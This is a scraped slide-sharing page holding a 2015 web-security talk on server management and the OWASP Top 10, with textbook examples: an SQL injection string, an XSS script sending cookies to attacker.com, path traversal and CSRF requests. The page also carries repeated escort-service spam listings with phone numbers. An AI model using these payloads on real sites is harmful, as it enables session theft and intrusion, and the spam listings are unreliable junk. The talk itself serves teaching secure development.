Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Chapter 3 Presentation
Chapter 3 PresentationChapter 3 Presentation
Chapter 3 Presentation
 
How to develop an AppSec culture in your project
How to develop an AppSec culture in your project How to develop an AppSec culture in your project
How to develop an AppSec culture in your project
 
Building an AppSec Culture
Building an AppSec Culture Building an AppSec Culture
Building an AppSec Culture
 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
 
00. introduction to app sec v3
00. introduction to app sec v300. introduction to app sec v3
00. introduction to app sec v3
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...
 
Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
 

Recently uploaded

Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Servicegwenoracqe6
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.soniya singh
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableSeo
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663Call Girls Mumbai
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLimonikaupta
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...Neha Pandey
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Standkumarajju5765
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...Escorts Call Girls
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girladitipandeya
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...SofiyaSharma5
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)Delhi Call girls
 

Recently uploaded (20)

(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in DubaiRussian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
 

Developing Secure Web Apps

  • 2. Introduction • Was: UH Student - Graduated 2012 • Now: Full Stack Developer at Cyber-Duck • Things I do: – Programmer: PHP, MySQL, Node.js (JavaScript), MongoDB, HTML/CSS etc. – System Administrator: Linux server management – Security Tester: Reviewing and testing web apps • Things I use: – TDD / BDD – Continuous Integration (Jenkins/Travis) – Vagrant + Docker 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 2
  • 3. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 3 Knowledge Transfer Partnerships “A relationship formed between a company and an academic institution ('Knowledge Base' partner), which facilitates the transfer of knowledge, technology and skills to which the company partner currently has no access. Each partnership employs one or more recently qualified people (known as an Associate) to work in a company on a project of strategic importance to the business, whilst also being supervised by the Knowledge Base Partner. Projects vary in length between 12 and 36 months. The Associates are either postgraduate researchers, university graduates, or individuals qualified to at least NVQ (Level 4) or equivalent.” WHEN YOU GRADUATE APPLY FOR THESE
  • 4. This talk… • A bit about Cyber-Duck • The development process • Server security • Application security • Testing 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 4
  • 5. About Cyber-Duck 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 5
  • 6. Our Clients 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 6
  • 7. The process • Research – Determine all security considerations for the project • User Experience – Follow best practices • Art Direction • Development – Design production environment – Secure coding – Continuous testing • Marketing • Support – Bug reports – More testing 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 7
  • 8. Server Security • Type of server – Cloud, dedicated, shared, in-house • Server stack – Operating system – Language / Technology – Database / Caching – Scaling options • Protection – Anti-virus & Anti-malware – Firewalls & IPS – Back ups – Others… 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 8
  • 9. Server Management • Most servers have similar configurations • More clients = more traffic = more servers • Need a way to keep all of them up to date • We use Configuration Management software • Several available, Ansible, Chef, Puppet, etc. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 9
  • 10. We use Puppet • Master server hold config for all servers • Agent servers read their config every half an hour • Patch once, everything updates • Able to use with Vagrant for development 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 10
  • 11. Application Security • Starts in the research phase of a project – Evaluate possible points of attack • UX design application with secure methods • Security is most relevant during Development – Be aware of vulnerabilities – Follow safe practices – Test for missed vulnerabilities • Post-launch continue testing – Bugs may reveal vulnerabilities – Bug-fixes may create vulnerabilities 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 11
  • 12. Staying aware of vulnerabilities • Official lists and statistics – OWASP Top 10, CSA, etc. • Mailing lists • Industry news • Blogs • Social media – especially twitter • Common Vulnerability Scoring System (CVSS) – https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 12
  • 13. OWASP Top 10 A1 Injection A2 Broken Authentication and Session Management A3 Cross-Site Scripting (XSS) A4 Insecure Direct Object References A5 Security Misconfiguration A6 Sensitive Data Exposure A7 Missing Function Level Access Control A8 Cross-Site Request Forgery (CSRF) A9 Using Components with Known Vulnerabilities A10 Unvalidated Redirects and Forwards 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 13
  • 14. Injection • Most common is SQL injection • Applications are vulnerable when user input is not validated Example: <?php $prod = $_POST[‘prod_id’]; $query = "SELECT * FROM users WHERE id LIKE '%$user%'"; $result = mysql_query($query); 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 14 user_id = "' OR 1; #" "SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"
  • 15. http://xkcd.com/327/ 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 15
  • 16. Broken Authentication and Session Management • Misconfiguration of authentication and session management • Attackers use this to compromise passwords, keys, session tokens or other valuable data Example: Session Hijacking http://example.com/loggedin?sess_id=a1b2c3d4e5f6 Victim emails this link, whoever receives the link is logged in to the victims account 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 16
  • 17. Cross-Site Scripting (XSS) • Occurs when un-validated user input is sent to the browser • Allows an attacker to execute scripts in the victims browser Example: Comment forms A comment is left: <script type=“text/javascript”> document.location = “http://attacker.com/post?cookie=“ + document.cookie; </script> 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 17
  • 18. Insecure Direct Object References • Internal implementations are revealed to the user e.g. file location or database key • This is not properly protected allowing an attacker to manipulate the reference Example: http://example.com/user_uploads/my_image.png http://example.com/user_uploads/../../.htaccess 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 18
  • 19. Security Misconfiguration • Several programs are required to run a single web application • Any one of these can have a vulnerability if misconfigured • Secure settings should be defined, implemented, and maintained, as defaults are often insecure. • Software should be kept up to date. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 19
  • 20. Sensitive Data Exposure • Applications dealing with sensitive data must protect it • Suitable encryption or hashing must be used effectively • Data needs to be protected in transit and at rest Example: A website encrypts credit card data in the database using the built-in encryption mechanism. An injection vulnerability exists in the application allowing database data to be decrypted. If the application encrypted before storing the injection attack would only discover encrypted data. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 20
  • 21. Missing Function Level Access Control • When a user logs in their access level is verified, this should also be verified on each subsequent request. Example: A website has user and admin areas, an attacker logs in as a user and is redirected to: http://example.com/user/dashboard They then go to the following URL with full access: http://example.com/admin 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 21
  • 22. Cross-Site Request Forgery (CSRF) • An attacker tricks a user into sending data from one website to another. Example: A user is logged in to their bank account, which uses a session cookie. The user then visits an attackers website with the following code: <img src=“http://bank.com/transfer?to=12345&amount=100” /> The cookie is sent so bank.com thinks the user made the request. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 22
  • 23. Using Components with Known Vulnerabilities • Modern web applications are built with libraries, frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code • Not updating these libraries may introduce vulnerabilities • Dependency managers (composer, npm, etc.) can help with this, but updates still need to be tested 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 23
  • 24. Unvalidated Redirects and Forwards • Sometimes it’s necessary to redirect a user from one application page to another. These redirects need to be validated to avoid misuse. Example: http://example.com/login?redirect=dashboard Is changed by an attacker to http://example.com/login?redirect=admin 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 24

Editor's Notes

  1. Independent digital agency Based in Elstree Specialise in UX Established in 2005 Award winning ISO accredited User Experience – Web & Mobile – Hosting & Support – Marketing – Consulting
  2. Close choice between Puppet and Chef Puppet has it’s own DSL, Chef uses Ruby Puppet is a few years more established, but both aren’t new